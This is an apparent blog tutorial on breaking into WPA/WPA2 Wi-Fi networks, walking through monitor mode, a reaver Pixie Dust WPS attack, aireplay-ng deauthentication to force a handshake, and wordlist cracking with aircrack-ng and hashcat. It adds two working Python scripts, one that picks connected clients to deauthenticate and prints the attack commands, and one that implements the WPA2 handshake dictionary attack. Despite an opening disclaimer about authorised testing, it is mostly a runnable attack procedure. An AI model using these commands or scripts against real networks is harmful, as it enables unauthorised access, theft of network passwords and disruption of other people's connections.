Disclaimer: only test wireless networks you own or have explicit, written permission to test. Everything below is done at your own risk.
The tools we will use

| Tool | Purpose |
| --- | --- |
| airmon-ng | Put your wireless NIC into monitor mode |
| airodump-ng | List the wireless networks (and their clients) your NIC can see, and capture packets to a file |
| wash / reaver | Find WPS-enabled routers (wash) and attack WPS (reaver) |
| aireplay-ng | Deauthenticate clients so they reconnect and produce a WPA handshake |
| aircrack-ng | Crack the pre-shared key from a captured WPA/WPA2 4-way handshake |
| hashcat (optional) | Faster than aircrack-ng and can use your GPU |
Step 1: Get your wireless NIC into monitor mode
Get your wireless NIC name. Usually it is wlan0
iwconfig
Now kill all processes that might hold on to that NIC and prevent it from going into monitor mode, such as NetworkManager and wpa_supplicant. Note that this drops your existing Wi-Fi connection.
sudo airmon-ng check kill
And now put your NIC into monitor mode:
sudo airmon-ng start wlan0
Run iwconfig again: you should now see something like wlan0mon with Mode:Monitor (the interface name depends on your driver; some keep the original name and only change the mode). Take note that not all wireless NICs and drivers support monitor mode.
Get your wireless NIC out of monitor mode and put things back the way they were
This will put things back to normal:
sudo airmon-ng stop wlan0mon
sudo service NetworkManager restart
Step 2: Airodump
Now run this command
sudo airodump-ng wlan0mon
If all goes well, you will see two tables that refresh continuously: at the top the access points (BSSID, PWR, Beacons, #Data, CH, ENC, CIPHER, AUTH, ESSID), and below them the stations, i.e. the clients, each with the BSSID it is associated with (or "(not associated)" if it is only probing).
The above command will channel hop, i.e. scan all channels, so if you want to monitor only a specific channel, run this command:
sudo airodump-ng -c 6 wlan0mon
And if you want to save the captured packets to a file, run this command (airodump-ng numbers its output files, so with a prefix of capture you get capture-01.cap, capture-01.csv and so on):
sudo airodump-ng -w capture wlan0mon
Step 2.1: Reaver and wash for WPS
Let's sidetrack to reaver quickly, as it focuses on WPS, which can be a lucrative attack vector. WPS 2.0, which most current routers use, is much less susceptible (routers lock WPS after a number of failed PIN attempts, and many newer chipsets are not affected by Pixie Dust), but it is definitely worth a look.
Just like airodump showed us the routers with their encryption and cipher, wash shows us the same routers with the WPS version they run and whether WPS is currently locked.
sudo wash -i wlan0mon
Once you have found a suitable target, run this command:
sudo reaver -i wlan0mon -b <target_bssid> -c <channel> -K 1
(-K 1 tells reaver to use the Pixie Dust attack, which recovers the WPS PIN offline from a single exchange when the router's chipset generates weak nonces.)
Take note that many routers lock WPS if you fire PIN attempts at them too quickly, so check the reaver help with sudo reaver -h for the -d (delay between attempts) and -l (delay after a lock) options to slow things down a bit.
Step 3: WPA handshake attack
In this section we will focus on capturing the WPA/WPA2 4-way handshake, which we can then crack offline using a wordlist such as rockyou.txt. (This is a WPA handshake, not a WPS exchange; WPS was covered in the previous step.)
Run the command below to capture packets for only one specific wireless router and to see which clients are connected to it. The handshake happens between the router and a client when the client (re)connects, so we need at least one connected client.
(The output file given in the command below, <output_file>-01.cap, will contain the captured packets, which we will use when cracking the password.)
sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_file> wlan0mon
- The top table shows the single BSSID we are sniffing for clients
- The bottom table lists all the clients (stations) connected to this BSSID; these are our deauth targets
- "WPA handshake: <BSSID>" appears in the top right corner once we have captured a handshake, which we will get to below
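With -w set, airodump-ng also writes <output_file>-01.csv next to the .cap file, and that CSV is the easiest place to pick deauth targets from. The following is an added example, not code from the original post or from the aircrack-ng project: it parses the two tables in that CSV (access points, then stations), lists the clients associated with the target BSSID busiest first, and prints the aireplay-ng command for each one. The sample CSV embedded below is constructed with made-up MAC addresses and ESSIDs, not a real capture.

```python
"""Pick deauth targets from the CSV that `airodump-ng -w <output_file>` writes.

Added example, not from the original post. The CSV has an access-point table and
a station table separated by a blank line; SAMPLE_CSV below is constructed data.
"""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str      # e.g. "WPA2"
    cipher: str       # e.g. "CCMP"
    auth: str         # e.g. "PSK"
    power: int        # signal in dBm (closer to 0 is stronger)
    essid: str


@dataclass
class Station:
    mac: str
    power: int
    packets: int
    bssid: str        # "(not associated)" for clients that are only probing
    probed: str       # comma-separated ESSIDs the client has probed for


def parse_airodump_csv(text: str) -> Tuple[List[AccessPoint], List[Station]]:
    """Parse airodump-ng's <prefix>-01.csv into AP and station records."""
    aps: List[AccessPoint] = []
    stations: List[Station] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("BSSID,"):          # header of the access-point table
            section = "ap"
            continue
        if line.startswith("Station MAC,"):    # header of the station table
            section = "sta"
            continue
        if section == "ap":
            f = [x.strip() for x in line.split(",")]
            if len(f) < 15:
                continue
            # Columns: BSSID, first seen, last seen, channel, speed, privacy, cipher,
            # auth, power, beacons, IVs, LAN IP, ID-length, ESSID, Key. An ESSID that
            # contains commas is spread over several fields; the last field is Key.
            essid = ",".join(f[13:-1]).strip()
            aps.append(AccessPoint(f[0], int(f[3]), f[5], f[6], f[7], int(f[8]), essid))
        elif section == "sta":
            # Columns: MAC, first seen, last seen, power, packets, BSSID, probed ESSIDs.
            # The probed-ESSID column may itself contain commas, so split at most 6 times.
            f = [x.strip() for x in line.split(",", 6)]
            if len(f) < 6:
                continue
            probed = f[6] if len(f) > 6 else ""
            stations.append(Station(f[0], int(f[3]), int(f[4]), f[5], probed))
    return aps, stations


def clients_of(stations: List[Station], bssid: str) -> List[str]:
    """Client MACs associated with the target BSSID, busiest first: a client that is
    actively passing traffic is the one most likely to reconnect promptly after a
    deauth and hand us the 4-way handshake."""
    assoc = [s for s in stations if s.bssid.upper() == bssid.upper()]
    return [s.mac for s in sorted(assoc, key=lambda s: s.packets, reverse=True)]


def deauth_commands(bssid: str, clients: List[str], iface: str = "wlan0mon",
                    count: int = 10) -> List[str]:
    """The aireplay-ng command line from the post, one per client (printed, not run)."""
    return [f"sudo aireplay-ng --deauth {count} -a {bssid} -c {mac} {iface}" for mac in clients]


# Constructed sample of what airodump-ng writes; MACs and ESSIDs are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
C8:51:11:22:33:44, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -41,      120,        0,   0.  0.  0.  0,   7, HomeNet,
DE:AD:BE:EF:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 130, WPA2, CCMP, PSK, -70,       80,        0,   0.  0.  0.  0,   9, Neighbour,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:00:00:01, 2024-01-01 10:00:30, 2024-01-01 10:04:59, -50,       45, C8:51:11:22:33:44, HomeNet
AA:BB:CC:00:00:02, 2024-01-01 10:01:00, 2024-01-01 10:04:50, -62,      310, C8:51:11:22:33:44,
AA:BB:CC:00:00:03, 2024-01-01 10:02:00, 2024-01-01 10:03:00, -80,        3, (not associated), CoffeeShop,HomeNet
"""

if __name__ == "__main__":
    target = "C8:51:11:22:33:44"
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for ap in aps:
        print(f"{ap.bssid} ch{ap.channel:<3} {ap.privacy}/{ap.cipher}/{ap.auth} {ap.power} dBm {ap.essid}")
    for cmd in deauth_commands(target, clients_of(stations, target)):
        print(cmd)
```

Run it against your own file with `parse_airodump_csv(open("<output_file>-01.csv").read())`. The third station in the sample is not associated with any AP and is only probing, so it is not a deauth target; deauthenticating a client that is not connected cannot produce a handshake.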
Forcing a deauth to get a WPA handshake
You can either wait for a handshake to occur, which happens when a client connects or a connected client reauthenticates, or you can force a connected client to reauthenticate. We will force a client to reauthenticate by sending deauthentication (deauth) frames to that client, spoofed as if they came from the router.
Open up a new terminal and issue this command:
sudo aireplay-ng --deauth 10 -a <BSSID> -c <Client_MAC> wlan0mon
You will know the deauth was successful when the terminal in which airodump-ng is running shows "WPA handshake: <BSSID>" in the top right corner. If it never appears, the client may not have reconnected while you were listening, or the network uses 802.11w Protected Management Frames, which makes forged deauth frames ineffective.
Step 4: Crack the WPA password
Let's validate our output file to make sure it contains a valid handshake. Run aircrack-ng without a wordlist; it lists every network in the capture and shows "1 handshake" next to the one we captured:
sudo aircrack-ng <output_file>-01.cap
Wordlists
You should have several wordlists in /usr/share/wordlists (on Kali), but we will use rockyou.txt. Unzip rockyou.txt.gz using this command:
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
Now you can start the cracking process (add -b <BSSID> if the capture contains more than one network):
sudo aircrack-ng <output_file>-01.cap -w /usr/share/wordlists/rockyou.txt
This will take quite some time depending on your CPU. On my old 4th gen dual core i5 laptop CPU, I only get 3500 or so keys per second, which is extremely slow compared to a modern CPU or GPU.
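To see why the rate is only a few thousand keys per second, it helps to do by hand what aircrack-ng and hashcat do with each wordlist entry: derive the PMK from the passphrase and SSID with 4096 rounds of PBKDF2-HMAC-SHA1, expand it into the PTK with the two MAC addresses and the two nonces from the handshake, and check whether the resulting key confirmation key (KCK) reproduces the MIC the client sent in message 2. The following is an added example, not code from the original post or from aircrack-ng. It builds its own handshake in build_sample_handshake() with a constructed SSID, MAC addresses, nonces and a known passphrase so that it runs offline; in practice those values come from the EAPOL-Key frames in <output_file>-01.cap.

```python
"""Dictionary attack on a WPA2-PSK 4-way handshake, done by hand.

Added example, not from the original post or from aircrack-ng/hashcat. The
handshake is constructed here with made-up values; real ones are read from the
EAPOL frames in the capture file.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

# Offset of the 16-byte MIC field in an EAPOL-Key frame: 4-byte 802.1X header
# plus 77 bytes of key descriptor before the MIC.
MIC_OFFSET = 81


@dataclass
class Handshake:
    ssid: bytes
    ap_mac: bytes        # 6 bytes
    client_mac: bytes    # 6 bytes
    anonce: bytes        # 32 bytes, from message 1 (AP -> client)
    snonce: bytes        # 32 bytes, from message 2 (client -> AP)
    eapol: bytes         # full EAPOL-Key message 2, MIC field still filled in
    mic: bytes           # the 16-byte MIC the client sent


def wpa2_pmk(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    The 4096 rounds (two 20-byte blocks of 4096 HMAC-SHA1 iterations each) are
    the whole reason cracking is slow; everything after this is cheap."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def wpa2_kck(pmk: bytes, ap_mac: bytes, client_mac: bytes,
             anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK (the KCK) from the 802.11i PRF:
    HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || min(MACs) || max(MACs)
                  || min(nonces) || max(nonces) || counter).
    Only the first PRF block is needed to check the MIC, so counter is 0."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return hmac.new(pmk, b"Pairwise key expansion\x00" + data + b"\x00",
                    hashlib.sha1).digest()[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the
    MIC field zeroed, truncated to 16 bytes. (WPA/TKIP used HMAC-MD5 instead.)"""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate: PMK -> KCK -> MIC, compare with the captured MIC."""
    for candidate in wordlist:
        pw = candidate.rstrip("\r\n")
        if not 8 <= len(pw) <= 63:      # WPA-PSK passphrase length rule; aircrack skips these too
            continue
        kck = wpa2_kck(wpa2_pmk(pw, hs.ssid), hs.ap_mac, hs.client_mac, hs.anonce, hs.snonce)
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic):
            return pw
    return None


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Construct an EAPOL-Key message 2 (client -> AP) carrying the given MIC."""
    body = (b"\x02"                        # descriptor type: IEEE 802.11 RSN
            + b"\x01\x0a"                  # key info: version 2 (HMAC-SHA1), pairwise, MIC set
            + b"\x00\x00"                  # key length
            + (1).to_bytes(8, "big")       # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # SNonce, key IV, key RSC, key ID
            + mic
            + b"\x00\x00")                 # key data length (no RSN IE in this sample)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v1, type EAPOL-Key


def build_sample_handshake(passphrase: str) -> Handshake:
    """Constructed sample: forge a message 2 whose MIC is valid for `passphrase`.
    SSID, MACs and nonces are made up."""
    ssid = b"HomeNet"
    ap_mac = bytes.fromhex("c85111223344")
    client_mac = bytes.fromhex("aabbcc000002")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    kck = wpa2_kck(wpa2_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    mic = eapol_mic(kck, build_msg2(snonce))
    return Handshake(ssid, ap_mac, client_mac, anonce, snonce, build_msg2(snonce, mic), mic)


if __name__ == "__main__":
    hs = build_sample_handshake("sunshine1")
    print(crack(hs, ["123456", "password", "sunshine1", "qwerty123"]))   # sunshine1
```

Two things follow from the derivation. The PMK depends on the SSID, so the same passphrase on a differently named network needs a fresh PBKDF2 run, which is why precomputed tables only work per SSID. And the MIC check needs both nonces and message 2 (or message 3) intact, so a capture that only contains message 1 is not crackable even though airodump-ng may have seen "some" of the handshake.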
Below is a bonus section where we will use hashcat.
Bonus Section: Hashcat
Hashcat tends to be quite a bit faster, in my case, about 15% on the CPU, plus it allows you to use your GPU if it is supported.
We first have to convert the cap file into hashcat's WPA format. The current mode (22000) takes the hc22000 format produced by hcxpcapngtool (the older hccapx format belongs to the deprecated mode 2500):
sudo apt-get install hcxtools
sudo hcxpcapngtool -o <output_file>.22000 <output_file>-01.cap
To see if you can use your GPU issue this command:
sudo hashcat -I
This will show all the devices you can use in the cracking process. I only have 1 device so I will specify “-d 1” in my hashcat command to use the first device which is my CPU.
Let's fire up hashcat to crack the password:
hashcat -m 22000 -a 0 -d 1 <output_file>.22000 /usr/share/wordlists/rockyou.txt
Now just let it finish and see if rockyou.txt contained the password! A cracked key is printed at the end of the hash line, and you can display it again later with hashcat -m 22000 <output_file>.22000 --show.